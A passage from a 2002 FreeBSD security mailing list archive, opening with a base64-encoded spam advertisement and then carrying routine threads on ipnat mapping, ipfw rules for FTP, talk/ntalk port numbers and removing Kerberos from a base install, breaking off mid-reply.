PiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9yZGVyPSIwIiBj ZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAgICAgICAgICAg 
PHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIj MDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFy ZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNl bGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJj cmF3bGVycy5jb20vaW1hZ2VzLzcuZ2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAg ICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAg ICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBj ZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9 IjIiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5TcGVhayANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICB3aXRoIGV4cGVydHM8L2ZvbnQ+PGJyPg0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgIDwvYj5EaXNjdXNzIHRoZSBsYXRlc3Qgc2VhcmNoIGVuZ2luZSBob3cg dG+ScyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3aXRoIGV4cGVydHMgaW4g dGhlIGFyZWEgb2Ygc2VhcmNoIGVuZ2luZSBvcHRpbWl6YXRpb24uIA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIDwvZm9udD48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQg d2lkdGg9IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9X Uy9EZXNrdG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0K ICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICA8L3Rh 
YmxlPg0KICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgPC90cj4N CiAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNy Yz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRo PSI0MjUiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAg ICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICA8dGQ+IA0KICAgICAgICAgICAg ICAgICAgICAgIDx0YWJsZSB3aWR0aD0iNDI1IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBj ZWxscGFkZGluZz0iMCI+DQogICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAg ICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3Jj PSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNrdG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0i MSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9 IjQwIiB2YWxpZ249InRvcCI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0YWJsZSB3 aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjQiPg0K ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgPHRkPjxpbWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFn ZXMvOC5naWYiIHdpZHRoPSIzMCIgaGVpZ2h0PSIyNCI+PC90ZD4NCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAg ICAgPHRkIHdpZHRoPSIzODMiPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUg d2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDx0ZD48Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiI+PGI+PGZvbnQgY29s b3I9IiNGRjAwMDAiPllhaG9vISANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBz dWJtaXNzaW9uLjwvZm9udD48YnI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg PC9iPldlIHdpbGwgc3VibWl0IHlvdXIgc2l0ZSB0byBZYWhvbyEgYWZ0ZXIgDQogICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgY2FyZWZ1bCBhbmFsaXphdGlvbiBvbiB0aGUgY2F0ZWdv 
cnkgdGhhdCB3aWxsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJlc3QgZml0 IHdpdGggWWFob28hIDwvZm9udD48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg PC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAg ICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9 IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNr dG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAg ICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0K ICAgICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAg ICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0 cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSI0MjUi IGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAg ICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgIDwvdHI+DQogICAg ICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICA8dGQgd2lkdGg9IjE1NSIgdmFsaWduPSJ0b3Ai PiZuYnNwOzwvdGQ+DQogICAgICAgICAgICAgIDx0ZCB3aWR0aD0iNDI1IiB2YWxpZ249InRvcCI+ Jm5ic3A7PC90ZD4NCiAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICA8dHI+IA0KICAgICAg ICAgICAgICA8dGQgd2lkdGg9IjU4MCIgdmFsaWduPSJ0b3AiIGNvbHNwYW49IjIiPiANCiAgICAg ICAgICAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPjxmb250IGZhY2U9IkFyaWFsLCBIZWx2ZXRp Y2EsIHNhbnMtc2VyaWYiIHNpemU9Ii0yIj5UbyANCiAgICAgICAgICAgICAgICAgIGJlIHBlcm1h bmVudGx5IHJlbW92ZWQgZnJvbSBvdXIgbWFpbGluZyBsaXN0LCBjbGljayByZXBseSBhbmQgDQog ICAgICAgICAgICAgICAgICBlbnRlciBSRU1PVkUgaW4gdGhlIHN1YmplY3QgYm94LiBBbnkgb3Ro ZXIgbWV0aG9kIFdJTEwgTk9UIGdldCANCiAgICAgICAgICAgICAgICAgIHlvdSByZW1vdmVkISA8 L2ZvbnQ+PC9kaXY+DQogICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICA8L3RyPg0KICAg ICAgICAgIDwvdGFibGU+DQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGFsaWduPSJjZW50 ZXIiPjwvZGl2Pg0KICAgICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPjwvZGl2Pg0KICAgICAgICA8 cD48Zm9udCBmYWNlPSJBcmlhbCwgSGVsdmV0aWNhLCBzYW5zLXNlcmlmIiBzaXplPSIyIiBjb2xv 
cj0iIzAwMDAzMyI+IA0KICAgICAgICAgIDwvZm9udD48L3A+DQogICAgICA8L3RkPg0KICAgIDwv dHI+DQogICAgPHRyIGhlaWdodD0iMTAiPiANCiAgICAgIDx0ZCB2YWxpZ249ImJvdHRvbSIgY29s c3Bhbj0iMiIgcm93c3Bhbj0iMyIgaGVpZ2h0PSIxIiBiZ2NvbG9yPSIjOTk5OTk5Ij4mbmJzcDsg DQogICAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyIGhlaWdodD0iOCI+IDwvdHI+DQogICAg PHRyIGhlaWdodD0iNiI+IDwvdHI+DQogIDwvdGFibGU+DQogIDxmb250IGZhY2U9IkFyaWFsLCBI ZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjNjY2NjY2IiBzaXplPSIyIj5Db3B5cmlnaHQg JmNvcHk7IA0KICAyMDAwLCBHTE9CQUwyMDAwLkNPTTwvZm9udD48L2Rpdj4NCjwvQk9EWT48L0hU TUw+DQoNCltpaXc3SWlVLW1YY2Z3QUJWay1xQ1RvalRobHJQdURuXQ0KDQo= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 3:27:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id C3B5737B405 for ; Fri, 10 May 2002 03:27:41 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) 
From: "Nielsen" To: References: <3CDA988D.34E2148C@centtech.com> <20020509170045.5584B37B414@hub.freebsd.org> <3CDAB25B.4B228C1B@centtech.com> Subject: Re: ipnat and bimapping MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020510102741.C3B5737B405@hub.freebsd.org> Date: Fri, 10 May 2002 03:27:41 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

It looks right, and I've done something like that before. But you'd have to give it a shot to be sure. Hope it works out.

Nate

> bimap sis0 10.10.20.2/32 -> 24.24.24.1/32
>
> map sis0 10.10.10.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000
> map sis0 10.10.10.0/24 -> 24.24.24.1/32
> map sis0 10.10.20.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000
> map sis0 10.10.20.0/24 -> 24.24.24.1/32
>
> map sis0 0.0.0.0/32 -> 0.0.0.0/32 proxy port 21 ftp/tcp

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 4:53:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 0BA6D37B403 for ; Fri, 10 May 2002 04:53:32 -0700 (PDT) Received: from d1o1108.telia.com (d1o1108.telia.com [217.209.148.241]) by maile.telia.com (8.11.6/8.11.6) with ESMTP id g4ABrU411156 for ; Fri, 10 May 2002 13:53:30 +0200 (CEST) Received: from insomnia (h51n2fls35o1108.telia.com [217.210.163.51]) by d1o1108.telia.com (8.10.2/8.10.1) with SMTP id g4ABrTm02591 for ; Fri, 10 May 2002 13:53:29 +0200 (CEST) Message-ID: <006601c1f81a$711452c0$fe00a8c0@insomnia>
From: "Nils Nordell" To: References: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Fri, 10 May 2002 14:01:38 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Are you running natd on the machine with the ADSL modem?
Then you could use the option "punch_fw" in /etc/natd.conf.
Punch_fw creates temporary firewall rules allowing ftp and irc
without trouble on the machines behind the firewall.

/ Nils

----- Original Message -----
From: "Drew Tomlinson"
To:
Sent: Thursday, May 09, 2002 7:48 PM
Subject: Allowing FTP Through *My* IPFW Firewall

> I'm trying to figure out what rule I need to add or change to allow ftp
> sessions to pass through my ipfw firewall. I have searched the archives
> but the only conclusion I have found is that this is a difficult task
> because of the nature of ftp. I'm hoping someone can help me with my
> specific situation.
>
> Here is how my home network is configured:
>
> ISP
> |
> | Public DHCP address
> |
> 3Com ADSL Modem/Router
> (Router performs NAT and passes packets to 10.2 by default)
> | (192.168.10.1)
> |
> |
> | (ed1 192.168.10.2)
> FBSD Gateway
> | (ed0 192.168.1.2)
> |
> |
> Internal LAN
>
>
> These are my current firewall rules:
>
> blacksheep# ipfw list
> 00100 allow ip from any to any via lo0
> 00200 deny log ip from any to 127.0.0.0/8
> 00300 deny log ip from 192.168.1.0/24 to any in recv ed1
> 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0
> 00500 check-state
> 00600 allow tcp from 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001 to any established
> 00700 allow tcp from any to 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001
> 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established
> 00900 allow tcp from any to 192.168.10.2 21,22,8021
> 01000 allow icmp from any to any icmptype 3,4,11,12
> 01100 allow icmp from any to any out icmptype 8
> 01200 allow icmp from any to any in icmptype 0
> 01300 reset log tcp from any to any 113
> 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123
> 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123
> 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123
> 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123
> 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123
> 01900 allow udp from 192.168.10.1 to any
> 02000 allow udp from any to 192.168.10.1
> 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1
> 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0
> 65500 deny log ip from any to any
>
> An FTP client on the outside can establish a session and login through
> the firewall but fails when the first data transfer (listing the remote
> directory) begins. Here is a sample entry from my security log:
>
> May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP 207.173.226.108:2191 192.168.1.4:49172 in via ed1
>
> Any help would be appreciated.
>
> Thanks,
>
> Drew
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 5:35:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from blacklamb.mykitchentable.net (ekgr-dsl2-01.citlink.net [207.173.226.1]) by hub.freebsd.org (Postfix) with ESMTP id 9BE0D37B405 for ; Fri, 10 May 2002 05:35:12 -0700 (PDT) Received: from bigdaddy (bigdaddy [192.168.1.3]) by blacklamb.mykitchentable.net (Postfix) with SMTP id A525EEE644 for ; Fri, 10 May 2002 05:35:11 -0700 (PDT) Message-ID: <003f01c1f81f$208dc0c0$0301a8c0@bigdaddy> From: "Drew Tomlinson" To: References: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> <006601c1f81a$711452c0$fe00a8c0@insomnia> Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Fri, 10 May 2002 05:35:11 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

----- Original Message -----
From: "Nils Nordell"
Sent: Friday, May 10, 2002 5:01 AM

> Are you running natd on the machine with the ADSL modem?
> Then you could use the option "punch_fw" in /etc/natd.conf.
> Punch_fw creates temporary firewall rules allowing ftp and irc
> without trouble on the machines behind the firewall.

No. The 3Com ADSL Modem/Router is not a FBSD box nor is it even a PC. It's a special purpose device running a proprietary OS, kind of like a LinkSys, Netgear, or DLink router with an ADSL modem built in.

Thanks for your response!

Drew

> / Nils
> ----- Original Message -----
> From: "Drew Tomlinson"
> To:
> Sent: Thursday, May 09, 2002 7:48 PM
> Subject: Allowing FTP Through *My* IPFW Firewall
>
>
> > I'm trying to figure out what rule I need to add or change to allow ftp
> > sessions to pass through my ipfw firewall. I have searched the archives
> > but the only conclusion I have found is that this is a difficult task
> > because of the nature of ftp. I'm hoping someone can help me with my
> > specific situation.
> >
> > Here is how my home network is configured:
> >
> > ISP
> > |
> > | Public DHCP address
> > |
> > 3Com ADSL Modem/Router
> > (Router performs NAT and passes packets to 10.2 by default)
> > | (192.168.10.1)
> > |
> > |
> > | (ed1 192.168.10.2)
> > FBSD Gateway
> > | (ed0 192.168.1.2)
> > |
> > |
> > Internal LAN
> >
> >
> > These are my current firewall rules:
> >
> > blacksheep# ipfw list
> > 00100 allow ip from any to any via lo0
> > 00200 deny log ip from any to 127.0.0.0/8
> > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1
> > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0
> > 00500 check-state
> > 00600 allow tcp from 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001 to any established
> > 00700 allow tcp from any to 192.168.1.0/24 21,22,25,80,143,389,443,993,5405,10001
> > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established
> > 00900 allow tcp from any to 192.168.10.2 21,22,8021
> > 01000 allow icmp from any to any icmptype 3,4,11,12
> > 01100 allow icmp from any to any out icmptype 8
> > 01200 allow icmp from any to any in icmptype 0
> > 01300 reset log tcp from any to any 113
> > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123
> > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123
> > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123
> > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123
> > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123
> > 01900 allow udp from 192.168.10.1 to any
> > 02000 allow udp from any to 192.168.10.1
> > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1
> > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0
> > 65500 deny log ip from any to any
> >
> > An FTP client on the outside can establish a session and login through
> > the firewall but fails when the first data transfer (listing the remote
> > directory) begins. Here is a sample entry from my security log:
> >
> > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP 207.173.226.108:2191 192.168.1.4:49172 in via ed1
> >
> > Any help would be appreciated.
> >
> > Thanks,
> >
> > Drew
> >
> >
> > To Unsubscribe: send mail to majordomo@FreeBSD.org
> > with "unsubscribe freebsd-security" in the body of the message
> >
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 6:41:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578187pcs.martnz01.ga.comcast.net [68.47.5.16]) by hub.freebsd.org (Postfix) with ESMTP id 7C83337B407 for ; Fri, 10 May 2002 06:41:17 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g4ADfGi07654 for ; Fri, 10 May 2002 09:41:16 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CDBCDFC.75062339@vortex.wa4phy.net> Date: Fri, 10 May 2002 09:41:16 -0400
From: Sam Drinkard
Organization: You Gotta Be Kiddin!
X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386)
X-Accept-Language: en, ja
MIME-Version: 1.0
To: security@freebsd.org
Subject: Second request Talk ports/sockets
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Since tightening up the firewall, my talk (from internal, not network) is broken. I can't seem to figure out what udp/tcp port(s) to open to allow the talk utility to work. Looking at the source code didn't help much either, but reference to sockets was mentioned. Once a user logs in, does the talk utility not use the localhost address for connections?

Hints?

Thanks..

Sam

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 8:41:13 2002
Delivered-To: freebsd-security@freebsd.org
Received: from sub21-156.member.dsl-only.net (sub21-156.member.dsl-only.net [63.105.21.156]) by hub.freebsd.org (Postfix) with ESMTP id 0DAFB37B403 for ; Fri, 10 May 2002 08:41:08 -0700 (PDT)
Received: from sub21-156.member.dsl-only.net (freebsd.localhost.localdomain [127.0.0.1]) by sub21-156.member.dsl-only.net (8.11.6/8.11.6) with SMTP id g4AFkrp76185; Fri, 10 May 2002 08:47:06 -0700 (PDT) (envelope-from nkinkade@dsl-only.com)
Date: Fri, 10 May 2002 08:46:53 -0700
From: Nathan Kinkade
To: Sam Drinkard
Cc: security@freebsd.org
Subject: Re: Second request Talk ports/sockets
Message-Id: <20020510084653.51d1ba8e.nkinkade@dsl-only.com>
In-Reply-To: <3CDBCDFC.75062339@vortex.wa4phy.net>
References: <3CDBCDFC.75062339@vortex.wa4phy.net>
X-Mailer: Sylpheed version 0.7.4claws (GTK+ 1.2.10; i386-portbld-freebsd4.5)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Fri, 10 May 2002 09:41:16 -0400 Sam Drinkard wrote:

> Since tightening up the firewall, my talk (from internal, not network)
> is broken. I can't seem to figure out what udp/tcp port(s) to open to
> allow the talk utility to work. Looking at the source code didn't
> help much either, but reference to sockets was mentioned. Once a user
> logs in, does the talk utility not use the localhost address for
> connections?

The port for talk is 517. The port for ntalk is 518.

I first found this out by launching ethereal (a network protocol analyzer that's in the ports collection). Then I attempted to launch a talk session with a non-existent host just to see some traffic. A quick review of the captured packets showed that my machine was attempting to communicate using ntalk on UDP port 518. I then did a quick search on Google for 'ntalk tcp port number'. The very first returned hit revealed the following.

talk            517/tcp    like tenex link, but across
#                          machine - unfortunately, doesn't
#                          use link protocol (this is actually
#                          just a rendezvous port from which a
#                          tcp connection is established)
talk            517/udp    like tenex link, but across
#                          machine - unfortunately, doesn't
#                          use link protocol (this is actually
#                          just a rendezvous port from which a
#                          tcp connection is established)
ntalk           518/tcp
ntalk           518/udp

Further, a quick browse through /etc/services revealed exactly the same text as above. Presumably that's where the site got the information in the first place.

There are plenty of ways to figure out information like this....it just requires that you think about it for a minute. The Google search engine is invaluable...and then again, as demonstrated above, often the info lies right on your own computer.

Hope this helps.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 8:51: 1 2002
Delivered-To: freebsd-security@freebsd.org
Received: from alfanett.no (mail1.alfanett.no [195.134.40.22]) by hub.freebsd.org (Postfix) with ESMTP id A7A7237B407 for ; Fri, 10 May 2002 08:50:57 -0700 (PDT)
Received: from goppus.overalt.no (kunde1323.alfanett.no [195.134.38.54]) by alfanett.no (8.9.3/8.9.3/alfaNETT1.0) with ESMTP id RAA08887 for ; Fri, 10 May 2002 17:50:56 +0200
Date: Fri, 10 May 2002 17:52:03 +0200
From: Marius Sorteberg
To: freebsd-security@FreeBSD.ORG
Subject: How to remove Kerberos from base install
Message-ID: <20020510093809.GA368@overalt.no>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
User-Agent: Mutt/1.3.28i
X-UID: 49
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Hi list.

How do I remove KerberosIV and Heimdal from my base install?
I know it's OK to delete all files related to the old Kerberos apps, but how do I know which files to delete?

I have included this in my /etc/make.conf, so it won't be built during the next make world.

MAKE_KERBEROS4= false
MAKE_KERBEROS5= false

Regards
Marius Sorteberg

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri May 10 9:25:43 2002
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4DA1737B409 for ; Fri, 10 May 2002 09:25:37 -0700 (PDT)
Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BE31043; Fri, 10 May 2002 11:25:36 -0500 (CDT)
Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.11.6) with ESMTP id g4AGPar7052262; Fri, 10 May 2002 11:25:36 -0500 (CDT) (envelope-from nectar@madman.nectar.cc)
Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g4AGPZgI052261; Fri, 10 May 2002 11:25:35 -0500 (CDT)
Date: Fri, 10 May 2002 11:25:35 -0500
From: "Jacques A. Vidrine"
To: Marius Sorteberg
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: How to remove Kerberos from base install
Message-ID: <20020510162535.GA52239@madman.nectar.cc>
Mail-Followup-To: "Jacques A. Vidrine" , Marius Sorteberg , freebsd-security@FreeBSD.ORG
References: <20020510093809.GA368@overalt.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020510093809.GA368@overalt.no>
User-Agent: Mutt/1.3.28i
X-Url: http://www.nectar.cc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Fri, May 10, 2002 at 05:52:03PM +0200, Marius Sorteberg wrote:
> Hi list.
>
> How do I remove KerberosIV and Heimdal from my base install?
> I know it's OK to delete all files related to the old Kerberos apps, but how
> do I know which files to delete?

I have two suggestions:

(1) Have a look at what is installed by
        cd /usr/src/kerberosIV && make install
        cd /usr/src/kerberos5 && make install

(2) Look at the contents of the krb4 and krb5 dists on the CD-ROM.

> I have included this in my /etc/make.conf, so it won't be built during the
